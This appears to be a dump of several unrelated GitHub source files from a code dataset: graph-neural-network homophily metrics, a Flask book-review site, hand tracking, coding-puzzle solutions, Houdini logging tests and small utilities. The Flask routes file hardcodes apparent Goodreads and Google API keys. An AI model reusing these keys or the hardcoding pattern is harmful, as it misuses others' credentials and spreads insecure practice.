+ 1))\n else:\n labels = torch.argmax(label, 1)[idx_train]\n label = label[idx_train, :]\n weight_matrix = (torch.zeros(torch.sum(idx_train.int()), labels.clone().detach().max() + 1))\n inner_prod = torch.mm(torch.spmm(adj, features)[idx_train, :],\n torch.spmm(adj, features)[idx_train, :].transpose(0, 1))\n for i in range(labels.max() + 1):\n # Think about using torch.sum or torch.mean\n if ifsum == 1:\n weight_matrix[:, i] = torch.sum(inner_prod[:, labels == i], 1)\n else:\n weight_matrix[:, i] = torch.mean(inner_prod[:, labels == i], 1)\n if hard is None:\n if ifsum == 1:\n nnodes = labels.shape[0]\n degs_label = torch.sum(torch.mm(label, label.transpose(0, 1)), 1)\n else:\n nnodes = labels.max() + 1\n degs_label = 1\n if LP == 1:\n # weight mean\n LAF_ratio = (weight_matrix[np.arange(labels.size(0)), labels] / degs_label) / \\\n ((torch.sum(weight_matrix, 1) - weight_matrix[np.arange(labels.size(0)), labels]) / (\n nnodes - degs_label))\n LAF_ratio[torch.isnan(LAF_ratio)] = 0\n return torch.mean((LAF_ratio >= 1).float()) #\n else:\n return torch.mean(((torch.sum(weight_matrix - weight_matrix * label, 1) <= 0) & (\n torch.sum(weight_matrix * label, 1) >= 0)).float())\n else:\n if LP == 1:\n return torch.mean(torch.argmax(weight_matrix, 1).eq(labels).float())\n else:\n return torch.mean(((torch.max(weight_matrix - weight_matrix * label, 1)[0] <= 0.) & (\n torch.sum(weight_matrix * label, 1) >= 0)).float())\n\n\ndef gntk_homophily_(features, adj, sample, n_layers):\n eps = 1e-8\n G_gram = torch.mm(torch.spmm(adj, features)[sample, :],\n torch.transpose(torch.spmm(adj, features)[sample, :], 0, 1))\n G_norm = torch.sqrt(torch.diag(G_gram)).reshape(-1, 1) * torch.sqrt(torch.diag(G_gram)).reshape(1, -1)\n G_norm = (G_norm > eps) * G_norm + eps * (G_norm <= eps)\n if n_layers == 1:\n arccos = torch.acos(torch.div(G_gram, G_norm))\n sqrt = torch.sqrt(torch.square(G_norm) - torch.square(G_gram))\n arccos[torch.isnan(arccos)], sqrt[torch.isnan(sqrt)] = 0, 0\n K_G = 1 / pi * (G_gram * (pi - arccos) + sqrt)\n else:\n K_G = G_gram\n\n gram = torch.mm(features[sample, :], torch.transpose(features[sample, :], 0, 1))\n norm = torch.sqrt(torch.diag(gram)).reshape(-1, 1) * torch.sqrt(torch.diag(gram)).reshape(1, -1)\n norm = (norm > eps) * norm + eps * (norm <= eps)\n if n_layers == 1:\n arccos = torch.acos(torch.div(gram, norm))\n sqrt = torch.sqrt(torch.square(norm) - torch.square(gram))\n arccos[torch.isnan(arccos)], sqrt[torch.isnan(sqrt)] = 0, 0\n K_X = 1 / pi * (gram * (pi - arccos) + sqrt)\n else:\n K_X = gram\n\n return K_G / 2, K_X / 2\n\n\ndef classifier_based_performance_metric(features, adj, labels, sample_max, base_classifier='kernel_reg1', epochs=100):\n nnodes = (labels.shape[0])\n if labels.dim() > 1:\n labels = labels.flatten()\n G_results, X_results, diff_results, G_good_p_results, X_good_p_results = torch.zeros(epochs), torch.zeros(\n epochs), torch.zeros(epochs), torch.zeros(epochs), torch.zeros(epochs)\n t_time = time.time()\n for j in range(epochs):\n\n if nnodes <= sample_max:\n sample = np.arange(nnodes)\n label_onehot = torch.eye(labels.max() + 1)[labels].cpu()\n labels_sample = labels.cpu()\n else:\n sample, _, _ = random_disassortative_splits(labels, labels.max() + 1, sample_max / nnodes)\n label_onehot = torch.eye(labels.max() + 1)[labels][sample, :].cpu()\n labels_sample = labels.cpu()[sample]\n\n idx_train, idx_val, idx_test = random_disassortative_splits(labels_sample, labels_sample.max() + 1)\n idx_val = idx_val + idx_test\n # Kernel Regression based p-values\n if base_classifier in {'kernel_reg0', 'kernel_reg1'}:\n nlayers = 0 if base_classifier == 'kernel_reg0' else 1\n K_graph, K = gntk_homophily_(features, adj, sample, nlayers)\n K_graph_train_train, K_train_train = K_graph[idx_train, :][:, idx_train], K[idx_train, :][:, idx_train]\n K_graph_val_train, K_val_train = K_graph[idx_val, :][:, idx_train], K[idx_val, :][:, idx_train]\n Kreg_G, Kreg_X = K_graph_val_train.cpu() @ (\n torch.tensor(np.linalg.pinv(K_graph_train_train.cpu().numpy())) @ label_onehot.cpu()[\n idx_train]), K_val_train.cpu() @ (\n torch.tensor(np.linalg.pinv(K_train_train.cpu().numpy())) @ label_onehot.cpu()[\n idx_train])\n diff_results[j] = (accuracy(labels_sample[idx_val], Kreg_G) > accuracy(labels_sample[idx_val], Kreg_X))\n G_results[j] = accuracy(labels_sample[idx_val],\n Kreg_G)\n X_results[j] = accuracy(labels_sample[idx_val],\n Kreg_X)\n elif base_classifier == 'gnb':\n # Gaussian Naive Bayes model\n X = features[sample].cpu()\n X_agg = torch.spmm(adj, features)[sample].cpu()\n\n X_gnb, G_gnb = GaussianNB(), GaussianNB()\n X_gnb.fit(X[idx_train], labels_sample[idx_train])\n G_gnb.fit(X_agg[idx_train], labels_sample[idx_train])\n\n X_pred = torch.tensor(X_gnb.predict(X[idx_val]))\n G_pred = torch.tensor(G_gnb.predict(X_agg[idx_val]))\n\n diff_results[j] = (torch.mean(G_pred.eq(labels_sample[idx_val]).float()) > torch.mean(\n X_pred.eq(labels_sample[idx_val]).float()))\n G_results[j] = torch.mean(G_pred.eq(labels_sample[idx_val]).float())\n X_results[j] = torch.mean(X_pred.eq(labels_sample[idx_val]).float())\n else:\n # SVM based p-values\n X = features[sample].cpu()\n X_agg = torch.spmm(adj, features)[sample].cpu()\n if base_classifier == 'svm_rbf':\n G_svm = svm.SVC(kernel='rbf', gamma=0.5, C=0.1).fit(X_agg[idx_train], labels_sample[idx_train])\n X_svm = svm.SVC(kernel='rbf', gamma=0.5, C=0.1).fit(X[idx_train], labels_sample[idx_train])\n elif base_classifier == 'svm_poly':\n G_svm = svm.SVC(kernel='poly', degree=3, C=1).fit(X_agg[idx_train], labels_sample[idx_train])\n X_svm = svm.SVC(kernel='poly', degree=3, C=1).fit(X[idx_train], labels_sample[idx_train])\n elif base_classifier == 'svm_linear':\n G_svm = svm.SVC(kernel='linear').fit(X_agg[idx_train], labels_sample[idx_train])\n X_svm = svm.SVC(kernel='linear').fit(X[idx_train], labels_sample[idx_train])\n\n G_pred = torch.tensor(G_svm.predict(X_agg[idx_val]))\n X_pred = torch.tensor(X_svm.predict(X[idx_val]))\n diff_results[j] = (torch.mean(G_pred.eq(labels_sample[idx_val]).float()) > torch.mean(\n X_pred.eq(labels_sample[idx_val]).float()))\n G_results[j] = torch.mean(G_pred.eq(labels_sample[\n idx_val]).float())\n X_results[j] = torch.mean(X_pred.eq(labels_sample[\n idx_val]).float())\n\n if scipy.__version__ == '1.4.1':\n g_aware_good_stats, g_aware_good_p = ttest_ind(X_results.detach().cpu(), G_results.detach().cpu(), axis=0,\n equal_var=False,\n nan_policy='propagate')\n else:\n g_aware_good_stats, g_aware_good_p = ttest_ind(X_results.detach().cpu(), G_results.detach().cpu(), axis=0,\n equal_var=False, nan_policy='propagate')\n\n if torch.mean(diff_results) <= 0.5:\n g_aware_good_p = g_aware_good_p / 2\n\n else:\n g_aware_good_p = 1 - g_aware_good_p / 2\n\n return g_aware_good_p, time.time() - t_time\n","repo_name":"SitaoLuan/When-Do-GNNs-Help","sub_path":"utils/homophily_metrics.py","file_name":"homophily_metrics.py","file_ext":"py","file_size_in_byte":15371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12212033214","text":"import requests\n\nfrom flask import flash, jsonify, make_response, render_template, redirect, request, session, url_for, abort \nfrom application import app, db\nfrom flask_login import current_user, login_required, login_user, logout_user\nfrom forms import * \nfrom models import *\nfrom sqlalchemy import or_, and_, func\nfrom datetime import datetime\nimport json\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n # session.permanent = True\n if current_user.is_authenticated:\n if request.method == 'POST':\n search_input = request.form.get(\"Search\")\n books = Book.query.filter(or_(\n Book.isbn.ilike(\"%\" + search_input + \"%\"),\n Book.title.ilike(\"%\" + search_input + \"%\"),\n Book.author.ilike(\"%\" + search_input + \"%\"))).all()\n if len(books) == 1: \n # if the search_input is an exact match, go directly book page\n book = Book.query.filter(or_(\n func.lower(Book.isbn) == func.lower(search_input),\n func.lower(Book.title) == func.lower(search_input),\n func.lower(Book.author) == func.lower(search_input))).first()\n if book: \n return redirect(url_for('book', isbn=book.isbn))\n # if search_input is not exact match, show list of potential books\n else:\n return render_template('index.html', title='Home', books=books)\n # if no books were found, print error message\n elif len(books) == 0: \n flash(\"We couldn't find {}. Sorry about that. :<\".format(search_input))\n # if multiple books found, show list of potential books\n else:\n return render_template('index.html', title='Home', books=books)\n return render_template('index.html', title='Home', books=None)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index')) \n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.add(user)\n db.commit()\n flash(\"Congratulations, you're in {}!\".format(user.username))\n return redirect(url_for('index')) \n return render_template('register.html', title='Register', form=form)\n\n \n@app.route('/login', methods=['GET','POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index')) \n form = LoginForm()\n if form.validate_on_submit():\n # Check if user is in the database\n user = User.query.filter_by(username=form.username.data).first()\n # If user doesn't exist or doesn't match password, error\n if user is None or not user.check_password(form.password.data) :\n flash('Incorrect username or password.')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n return redirect(url_for('index'))\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route('/logout')\n@login_required # pecautionary step; shouldn't be necessary though \ndef logout():\n logout_user()\n return redirect(url_for('index')) \n\n\n@app.route('/book/', methods=['GET', 'POST']) \n@login_required\ndef book(isbn):\n # find first book that matches requested isbn\n book = Book.query.filter_by(isbn=isbn).first()\n if not book:\n flash('No book!')\n return redirect(url_for('index')) \n\n # create a form to submit book reviews\n form = ReviewForm()\n if form.validate_on_submit():\n # check if this user has a review for this book already\n existing_review = Review.query.filter(and_(Review.user_id == current_user.id,\n Review.book_id == book.id)).first()\n\n # if review exists already, call them a lil bitch\n if existing_review:\n flash(\"You already reviewed this book.\")\n # if review doesn't exist yet, add the new one \n else:\n review = Review(rating=form.rating.data, body=form.body.data,\n date=datetime.utcnow().strftime(\"%m-%d-%Y\"), \n user_id=current_user.id, book_id=book.id)\n db.add(review)\n db.commit()\n flash(\"Thank you for your review!\")\n \n # get summed ratings from bookBook\n ratings_BB = [rev.rating for rev in \n Review.query.filter_by(book_id=book.id).all()] \n sum_ratings_BB = sum(ratings_BB)\n\n # request data for this isbn from goodreads api\n goodreads = requests.get(\"https://www.goodreads.com/book/review_counts.json\", \n params={\"key\": \"wbYVNp1WvHbg0SdF1fCvoA\", \n \"isbns\": isbn})\n\n # check if get request was successful\n if goodreads.status_code != 200:\n raise Exception('ERROR: API request unsuccessful.')\n\n # convert goodreads request to json format and get avg/num ratings on this book \n data_GR = goodreads.json()\n avg_rating_GR = float(data_GR['books'][0]['average_rating'])\n num_ratings_GR = int(data_GR['books'][0]['work_ratings_count'])\n\n # calculate average rating across goodreads anad bookBook \n total_ratings = num_ratings_GR + len(ratings_BB)\n avg_rating = round((((avg_rating_GR * num_ratings_GR) + \n sum_ratings_BB)/total_ratings), 2)\n \n # Get book summary from google books API\n google_api = requests.get(\"https://www.googleapis.com/books/v1/volumes/?q=\" \n + \"isbn:\" + isbn \n + \"&key=AIzaSyCQq78hfnGQDacarWCJ2qOC_Ec0-eKvcyc\")\n \n if google_api.status_code != 200:\n raise Exception('ERROR: API request unsuccessful.')\n \n data_G = google_api.json()\n\n # check if the google api has the book description\n if ('items' not in data_G \n or 'volumeInfo' not in data_G['items'][0] \n or 'description' not in data_G['items'][0]['volumeInfo']):\n summary = \"No summary available.\"\n # if description exist, extract it \n else: \n summary = data_G['items'][0]['volumeInfo']['description'] \n\n return render_template('book.html', book=book, reviews=book.reviews[::-1],\n form=form, rating=avg_rating, num_ratings=total_ratings, summary=summary)\n\n\n# method for api access\n@app.route('/api/')\ndef access(isbn):\n\n # find first book that matches requested isbn\n book = Book.query.filter_by(isbn=isbn).first()\n if not book:\n return jsonify({\"error\": \"invalid isbn\"}), 404\n\n # get summed ratings from bookBook\n ratings_BB = [rev.rating for rev in \n Review.query.filter_by(book_id=book.id).all()] \n sum_ratings_BB = sum(ratings_BB)\n\n # request data for this isbn from goodreads api\n goodreads = requests.get(\"https://www.goodreads.com/book/review_counts.json\", \n params={\"key\": \"wbYVNp1WvHbg0SdF1fCvoA\", \n \"isbns\": isbn})\n\n # check if get request was successful\n if goodreads.status_code != 200:\n raise Exception('ERROR: API request unsuccessful.')\n\n # convert goodreads request to json format and get avg/num ratings on this book \n data_GR = goodreads.json()\n avg_rating_GR = float(data_GR['books'][0]['average_rating'])\n num_ratings_GR = int(data_GR['books'][0]['work_ratings_count'])\n\n # calculate average rating across goodreads anad bookBook \n total_ratings = num_ratings_GR + len(ratings_BB)\n avg_rating = round((((avg_rating_GR * num_ratings_GR) + \n sum_ratings_BB)/total_ratings), 2)\n return jsonify({\n \"title\": book.title,\n \"author\": book.author,\n \"year\": book.year,\n \"book\": isbn,\n \"review_count\": total_ratings,\n \"average_score\": avg_rating})\n\n\n@app.route('/user/')\n@login_required\ndef user(username):\n user = User.query.filter_by(username=username).first()\n if not user:\n abort(404)\n return render_template('user.html', user=user, reviews=user.reviews)\n","repo_name":"e2nguyen/bookBook","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31113463438","text":"import cv2\nimport mediapipe as mp\nimport random\nfrom hand_meaning import hand_pos, hand_angle\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\ncap = cv2.VideoCapture(0)\nw, h = 640, 480\n\nwhile True:\n \n ret, frame = cap.read()\n frame = cv2.resize(frame, (w,h))\n with mp_hands.Hands(\n static_image_mode=False,\n max_num_hands=2,\n min_detection_confidence=0.5) as hands:\n frame= cv2.flip(frame,1)\n results = hands.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n if(results.multi_hand_landmarks == None): # for protection\n print(\"no hand\")\n cv2.imshow('frame', frame)\n key = cv2.waitKey(1)\n if(key==27):\n break\n else :\n for hand_landmarks in results.multi_hand_landmarks: \n showPoint = mp_hands.HandLandmark.INDEX_FINGER_TIP\n xPoint = hand_landmarks.landmark[showPoint].x * w\n yPoint = hand_landmarks.landmark[showPoint].y * h\n frame = cv2.circle(frame, (int(xPoint),int(yPoint)), 5, (255,0,0), -1)\n cv2.imshow('frame', frame)\n key = cv2.waitKey(1)\n if(key==27):\n break\n \n ","repo_name":"JuFengWu/image_process","sub_path":"mediapipe/hand/streaming_finger_point.py","file_name":"streaming_finger_point.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15309342249","text":"import os\nimport re\n\n\ndef newest_sample(template: str, ext: str = \".jpg\", cur_dir=\".\", zf: int = 4, c: int = 0):\n flist = [i for i in os.listdir(cur_dir) if i.endswith(ext)]\n c = 0\n for i in flist:\n res = re.match(template, i)\n if res:\n res = res.groups()[0]\n zf = len(res)\n c = max(c, int(res))\n return c, zf\n\ndef ensure_path(path: str, is_dir: bool = True):\n try:\n if is_dir:\n os.makedirs(path)\n else:\n return os.path.isfile(path)\n except OSError:\n if is_dir and os.path.isfile(path):\n raise\n\n\ndef validate_dataset(path: str):\n ensure_path(path)\n file_list = [fn.split(\".\")[-1] for fn in os.listdir(path)]\n return \"names\" in file_list\n","repo_name":"Jecosine/allib","sub_path":"allib/utils/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69869850981","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n charFreq = {} # Keep track of the count of every character in the pattern we are trying to match\n for char in t:\n if char not in charFreq:\n charFreq[char] = 0\n charFreq[char] += 1\n \n matched = 0 # Keep track of all the characters we have fully matched\n minStart = 0 # Keep track of the start of the smallest substring/window\n minLength = float('inf') # Keep track of the minimum window/substring length\n windowStart = 0\n \n for windowEnd in range(len(s)):\n char = s[windowEnd] # Current character\n \n if char in charFreq:\n charFreq[char] -= 1\n \n if charFreq[char] == 0:\n matched += 1\n \n while matched == len(charFreq):\n windowSize = windowEnd - windowStart + 1 # Current window size\n if windowSize < minLength:\n minLength = windowSize\n minStart = windowStart\n \n remove = s[windowStart] # The character we are going to remove from the window\n \n if remove in charFreq:\n # If we are removing the last instance of this character from our window\n if charFreq[remove] == 0:\n matched -= 1 # Decrement matched since we have 1 less matched character now\n charFreq[remove] += 1 # Add that character back into the charFreq hashmap\n windowStart += 1 # Increment windowStart to shrink the window\n \n if minLength == float('inf'):\n return \"\"\n return s[minStart: minStart + minLength]","repo_name":"Vamsi995/LeetCode-Python","sub_path":"0076-minimum-window-substring/0076-minimum-window-substring.py","file_name":"0076-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29398303297","text":"def solution(fees,records):\n\tpark_log = dict()\n\tfor record in records:\n\t\ttime,num,state = record.split()\n\t\ttime = int(time[:2]) * 60 + int(time[3:5])\n\t\tif num not in park_log:\n\t\t\tpark_log[num] = []\n\t\tpark_log[num].append(time)\n\n\tcarlist = sorted(park_log.keys())\n\tanswer = []\n\n\tfor number in carlist:\n\t\ttotal = 0\n\t\tif len(park_log[number]) % 2 == 1:\n\t\t\tpark_log[number].append(23*60+59)\n\t\tfor i in range(0,len(park_log[number]),2):\n\t\t\ttotal += park_log[number][i+1]-park_log[number][i]\n\t\tif total <= fees[0]:\n\t\t\tanswer.append(fees[1])\n\t\telse:\n\t\t\tprice = fees[1]\n\t\t\ttotal -= fees[0]\n\t\t\tprice += (total // fees[2]) * fees[3]\n\t\t\tif total % fees[2] != 0:\n\t\t\t\tprice += fees[3]\n\t\t\tanswer.append(price)\n\n\treturn answer\n\nif __name__ == \"__main__\":\n\tprint(solution([120, 0, 60, 591],[\"16:00 3961 IN\", \"16:00 0202 IN\", \"18:00 3961 OUT\", \"18:00 0202 OUT\", \"23:58 3961 IN\"]))","repo_name":"ZScomnet/Programmers","sub_path":"kakao/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14459719083","text":"\"\"\"Tests for houdini_toolbox.logging.adapters module.\"\"\"\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\n# Standard Library\nimport logging\n\n# Third Party\nimport pytest\n\n# Houdini Toolbox\nimport houdini_toolbox.logging.adapters\n\n# Houdini\nimport hou\n\n# =============================================================================\n# FIXTURES\n# =============================================================================\n\n\n@pytest.fixture\ndef test_adapter():\n \"\"\"Fixture to provide a minimally set up HoudiniLoggerAdapter.\"\"\"\n logger = logging.getLogger(\"test_logger\")\n\n adapter = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter(logger)\n\n yield adapter\n\n\n# =============================================================================\n# TESTS\n# =============================================================================\n\n\nclass Test_HoudiniLoggerAdapter:\n \"\"\"Test houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.\"\"\"\n\n def test___init__(self, mocker):\n \"\"\"Test object initialization.\"\"\"\n test_logger = logging.getLogger(\"test_logger\")\n extra = {\"extra\": \"value\"}\n\n mock_dialog = mocker.MagicMock(spec=bool)\n mock_node = mocker.MagicMock(spec=hou.Node)\n mock_status_bar = mocker.MagicMock(spec=bool)\n\n log = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter(\n test_logger, mock_node, mock_dialog, mock_status_bar, extra=extra\n )\n\n assert log.logger == test_logger\n assert log.extra == extra\n\n assert log._dialog == mock_dialog\n assert log._node == mock_node\n assert log._status_bar == mock_status_bar\n\n def test_from_name(self):\n \"\"\"Test HoudiniLoggerAdapter.from_name().\"\"\"\n result = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.from_name(\n \"test_name\"\n )\n\n assert result.logger.name == \"test_name\"\n\n result = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.from_name(\n \"test_name\",\n node=hou.node(\"/obj\"),\n dialog=True,\n status_bar=True,\n extra={\"foo\": \"bar\"},\n )\n\n assert result.logger.name == \"test_name\"\n assert result.node == hou.node(\"/obj\")\n assert result.dialog\n assert result.status_bar\n assert result.extra == {\"foo\": \"bar\"}\n\n # Properties\n\n def test_dialog(self, test_adapter):\n \"\"\"Test HoudiniLoggerAdapter.dialog.\"\"\"\n assert not test_adapter.dialog\n\n test_adapter.dialog = True\n assert test_adapter._dialog\n\n def test_node(self, test_adapter):\n \"\"\"Test HoudiniLoggerAdapter.node.\"\"\"\n assert test_adapter.node is None\n\n test_node = hou.node(\"/obj\")\n test_adapter.node = test_node\n assert test_adapter._node == test_node\n\n def test_status_bar(self, test_adapter):\n \"\"\"Test HoudiniLoggerAdapter.status_bar.\"\"\"\n assert not test_adapter.status_bar\n\n test_adapter.status_bar = True\n assert test_adapter._status_bar\n\n # Methods\n\n def test_process__node_arg(self, test_adapter, mock_ui_unavailable):\n \"\"\"Test HoudiniLoggerAdapter.process() when passing a node.\"\"\"\n kwargs = {\"extra\": {\"node\": hou.node(\"/out\")}}\n\n test_adapter.node = hou.node(\"/obj\")\n\n result = test_adapter.process(\"test logger message\", kwargs)\n\n assert result == (\"/out - test logger message\", kwargs)\n\n def test_process__node_property(self, test_adapter, mock_ui_unavailable):\n \"\"\"Test HoudiniLoggerAdapter.process() when using the node property.\"\"\"\n kwargs = {\"extra\": {}}\n\n test_adapter.node = hou.node(\"/obj\")\n\n result = test_adapter.process(\"test logger message\", kwargs)\n\n assert result == (\"/obj - test logger message\", kwargs)\n\n def test_process__ui_passed_no_severity_no_title(\n self, mocker, test_adapter, mock_hou_ui\n ):\n \"\"\"Test HoudiniLoggerAdapter.process() when passing 'dialog' and 'status_bar' via the extra dict.\"\"\"\n mock_message = mocker.MagicMock(spec=str)\n\n kwargs = {\"extra\": {\"dialog\": True, \"status_bar\": True}}\n\n result = test_adapter.process(mock_message, kwargs)\n\n assert result == (mock_message, kwargs)\n\n mock_hou_ui.displayMessage.assert_called_with(\n mock_message, severity=hou.severityType.Message, title=None\n )\n mock_hou_ui.setStatusMessage.assert_called_with(\n mock_message, severity=hou.severityType.Message\n )\n\n def test_process__ui_properties_with_severity_and_title(\n self, mocker, test_adapter, mock_hou_ui\n ):\n \"\"\"Test HoudiniLoggerAdapter.process() passing 'dialog' and 'status_bar' via properties with a severity\n and title.\"\"\"\n test_adapter.dialog = True\n test_adapter.status_bar = True\n\n mock_message = mocker.MagicMock(spec=str)\n mock_title = mocker.MagicMock(spec=str)\n\n kwargs = {\"extra\": {\"severity\": hou.severityType.Error, \"title\": mock_title}}\n\n result = test_adapter.process(mock_message, kwargs)\n\n assert result == (mock_message, kwargs)\n\n mock_hou_ui.displayMessage.assert_called_with(\n mock_message, severity=hou.severityType.Error, title=mock_title\n )\n mock_hou_ui.setStatusMessage.assert_called_with(\n mock_message, severity=hou.severityType.Error\n )\n\n def test_process__message_args(self, test_adapter, mock_hou_ui):\n \"\"\"Test HoudiniLoggerAdapter.process() passing 'message_args'.\"\"\"\n test_adapter.dialog = True\n\n kwargs = {\"extra\": {\"message_args\": (\"extra\", 3)}}\n\n result = test_adapter.process(\"test logger message %s %d\", kwargs)\n\n assert result == (\"test logger message %s %d\", kwargs)\n\n mock_hou_ui.displayMessage.assert_called_with(\n \"test logger message extra 3\",\n severity=hou.severityType.Message,\n title=None,\n )\n\n def test_process__message_args_no_display(self, test_adapter, mock_hou_ui):\n \"\"\"Test HoudiniLoggerAdapter.process() passing 'message_args' but not displaying them.\"\"\"\n kwargs = {\"extra\": {\"message_args\": (\"extra\", 3)}}\n\n result = test_adapter.process(\"test logger message %s %d\", kwargs)\n\n assert result == (\"test logger message %s %d\", kwargs)\n\n mock_hou_ui.displayMessage.assert_not_called()\n\n def test_process__no_extra(self, mocker, test_adapter):\n \"\"\"Test HoudiniLoggerAdapter.process() when passing an empty kwargs dict.\"\"\"\n mock_message = mocker.MagicMock(spec=str)\n\n kwargs = {}\n\n result = test_adapter.process(mock_message, kwargs)\n\n assert result == (mock_message, kwargs)\n\n @pytest.mark.parametrize(\n \"level, severity, num_message_args, passed_kwargs\",\n [\n (\"info\", hou.severityType.ImportantMessage, 0, {\"status_bar\": True}),\n (\"warning\", hou.severityType.Warning, 1, {\"node\": hou.node(\"/obj\")}),\n (\"error\", hou.severityType.Error, 2, {\"dialog\": True}),\n (\"critical\", hou.severityType.Error, 1, {\"title\": \"A Title\"}),\n (\"debug\", hou.severityType.Message, 1, {\"stacklevel\": 3}),\n (\"exception\", hou.severityType.Error, 1, {}),\n ],\n )\n def test_calls(\n self, mocker, test_adapter, level, severity, num_message_args, passed_kwargs\n ):\n \"\"\"Test the various log calls.\n\n This helps to test the _wrap_logger functionality and that the wrapping occurred as expected.\n \"\"\"\n mock_logger = mocker.MagicMock(spec=logging.Logger)\n mocker.patch.object(test_adapter, \"logger\", mock_logger)\n\n mock_msg = mocker.MagicMock(spec=str)\n\n message_args = tuple(\n [mocker.MagicMock(spec=str) for i in range(num_message_args)]\n )\n\n kwargs = {\n \"foo\": 3, # A dummy extra kwarg our calling code does not care about\n }\n kwargs.update(passed_kwargs)\n\n # We're going to mock process() call to determine whether all our wrapper logic\n # runs and passes the expected data for the actual log call.\n mock_process = mocker.patch(\n \"houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.process\",\n return_value=(mocker.MagicMock(spec=str), kwargs),\n )\n\n expected_kwargs = {\n \"foo\": 3,\n \"extra\": {\n \"severity\": severity,\n },\n \"stacklevel\": passed_kwargs.get(\"stacklevel\", 4),\n }\n\n # If there were any extra message args we expect them to have been added\n # to the extra dict.\n if num_message_args:\n expected_kwargs[\"extra\"][\"message_args\"] = message_args\n\n for arg, value in passed_kwargs.items():\n if arg in (\"node\", \"dialog\", \"status_bar\", \"title\"):\n expected_kwargs[\"extra\"][arg] = value\n\n # If logging an exception, ensure that exc_info=True is passed.\n if level == \"exception\":\n expected_kwargs[\"exc_info\"] = True\n\n getattr(test_adapter, level)(mock_msg, *message_args, **kwargs)\n\n mock_process.assert_called_with(mock_msg, expected_kwargs)\n","repo_name":"captainhammy/Houdini-Toolbox","sub_path":"tests/python/logging/test_adapters.py","file_name":"test_adapters.py","file_ext":"py","file_size_in_byte":9304,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"35"} +{"seq_id":"31239844934","text":"import play_scraper\nimport json\n\n\ndef main():\n with open('input_file', 'r', encoding='utf-8') as file:\n for query in file.readlines():\n answer = play_scraper.search(query=query, page=12, detailed=True)\n if answer:\n for app in answer:\n file = open(f'exit/{app[\"app_id\"]}.json', 'w')\n out = {}\n for i, j in app.items():\n try:\n j = j.decode('utf-8')\n except:\n pass\n finally:\n out[i] = j\n json.dump(out, file, indent=4, sort_keys=True)\n else:\n main()\n\nif __name__ == '__main__':\n main()","repo_name":"Vladikasik/Kwork-googleplay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6643789704","text":"class Node:\r\n\r\n def __init__(self,val) -> None:\r\n self.value=val\r\n self.next=None\r\n\r\nclass LinkedList:\r\n def __init__(self) -> None:\r\n self.head=None\r\n\r\n\r\n def insert_node(self,node):\r\n if self.head==None:\r\n self.head=node\r\n else:\r\n node.next=self.head\r\n self.head=node\r\n\r\n\r\n def traverse_list(self):\r\n if self.head==None:\r\n print(\"Empty list\")\r\n else:\r\n temp=self.head\r\n while(temp!=None):\r\n print(temp.value)\r\n temp=temp.next\r\n def delete_elememt(self,dele_val):\r\n if self.head==None:\r\n print(\"List is empty...Nothing to be deleted\")\r\n else:\r\n temp=self.head\r\n if temp.value == dele_val:\r\n self.head=self.head.next\r\n else:\r\n while(temp!=None):\r\n if temp.next.value==dele_val:\r\n temp.next=temp.next.next\r\n \r\n temp=temp.next\r\n if temp.next==None:\r\n break\r\n \r\n\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n llist=LinkedList()\r\n num=int(input(\"How many element you want to enter :\"))\r\n for i in range(num):\r\n ele=int(input(\"Enter your element: \"))\r\n temp= Node(ele)\r\n llist.insert_node(temp)\r\n print(\"Here is your list \")\r\n llist.traverse_list()\r\n delete_elememt=int(input(\"Enter your element to be deleted\"))\r\n llist.delete_elememt(delete_elememt)\r\n print(\"After deletion of {} from linked list..Here is your list\".format(delete_elememt))\r\n llist.traverse_list()\r\n\r\n \r\n","repo_name":"luharukas/Operation-on-Data-Structure","sub_path":"Delete_node_from_linked_list.py","file_name":"Delete_node_from_linked_list.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27919688312","text":"from pathlib import Path\n\nfrom skimage.color import grey2rgb\nfrom skimage.io import imread, imsave\nfrom skimage.morphology import binary_dilation\nfrom skimage import img_as_uint, img_as_float\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.ndimage as ndi\n\nfrom inpainting import Inpainting\nimport inpainting.utils as 